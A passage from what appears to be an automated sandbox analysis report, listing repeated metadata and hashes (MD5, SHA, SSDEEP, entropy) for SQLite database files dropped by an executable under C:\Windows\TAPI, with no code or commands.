                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
